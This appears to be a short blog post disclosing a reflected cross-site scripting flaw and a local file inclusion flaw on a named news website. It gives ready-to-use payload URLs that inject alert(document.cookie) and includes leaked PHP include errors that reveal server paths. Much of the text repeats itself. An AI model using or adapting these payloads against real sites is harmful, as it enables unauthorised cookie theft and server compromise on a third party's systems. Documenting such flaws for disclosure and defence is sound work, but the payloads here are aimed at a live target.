XSS
modifies the script within the setTimeout (works after 300000 ms)
http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie+'
http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie);",1);setTimeout("alert('
Local File Inclusion
the same problem is identical in several parts of the website even if blind (no error in the output).
http://www.adnkronos.com/IGN/Zoom/?id=
sample error (added a ' )
The error doesn't always appear. Probably the response is from different servers and only one of those is showing the errors to the output. I'm not really sure and I'm not doing any further testing (files are included and executed for sure).
modifies the script within the setTimeout (works after 300000 ms)
http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie+'
http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie);",1);setTimeout("alert('
Local File Inclusion
the same problem is identical in several parts of the website even if blind (no error in the output).
http://www.adnkronos.com/IGN/Zoom/?id=
sample error (added a ' )
Warning: include(news/3.0.4217592951\'.inc.php) [function.include]: failed to open stream: No such file or directory in /opt/apache2/www60/IGN/Zoom/index.php on line 11
Warning: include() [function.include]: Failed opening 'news/3.0.4217592951\'.inc.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /opt/apache2/www60/IGN/Zoom/index.php on line 11
The error doesn't always appear. Probably the response is from different servers and only one of those is showing the errors to the output. I'm not really sure and I'm not doing any further testing (files are included and executed for sure).
Comments
Post a Comment